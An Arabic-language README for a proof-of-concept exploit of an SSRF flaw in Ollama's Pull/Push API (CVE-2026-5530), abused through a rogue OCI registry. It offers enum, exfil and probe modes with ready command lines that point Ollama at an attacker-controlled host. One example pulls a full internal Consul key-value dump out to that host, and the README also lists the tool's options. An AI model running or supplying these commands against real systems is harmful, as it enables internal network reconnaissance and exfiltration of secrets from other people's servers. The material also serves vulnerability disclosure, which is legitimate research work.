
إثبات مفهوم لاستغلال CVE-2026-5530، وهو ثغرة SSRF في واجهة برمجة تطبيقات Pull/Push الخاصة بـ Ollama، مما يتيح تعداد نقاط النهاية الداخلية واستخراج الاستجابات الكاملة عبر سجل OCI خادع.
ثغرة SSRF في Ollama عبر إعادة توجيه سجل OCI مع استخراج كامل للاستجابة.
التقرير الفني: https://davidrochester.com/posts/cve-2026-5530
تم التواصل مع Ollama عدة مرات دون أي رد.
ثلاثة أوضاع: enum (الاستكشاف)، exfil (الاستخراج)، و probe (الاستطلاع).
يكتشف نقاط النهاية الداخلية الحية التي يمكن الوصول إليها من مضيف Ollama.
python3 poc.py targets.txt --registry-host <your-ip>
يستخرج استجابات SSRF عندما تعرف حجم الاستجابة.
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>
يبحث ثنائيًا عن حجم الاستجابة تلقائيًا، ثم يستخرجها.
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>
target عنوان URL أو ملف عناوين URL (عنوان واحد لكل سطر، # للتعليقات)
-p, --port منفذ السجل المارق (الافتراضي: 9999)
--exfil-port منفذ سجل الاستخراج (الافتراضي: 10000)
--exfil وضع الاستخراج، يتطلب --size
--probe بحث ثنائي عن الحجم، ثم استخراج
--size Content-Length (مطلوب مع --exfil)
--registry-host عنوان IP/اسم المضيف الخاص بالمهاجم الذي يمكن لـ Ollama الوصول إليه
--ollama عنوان Ollama API (الافتراضي: http://127.0.0.1:11434)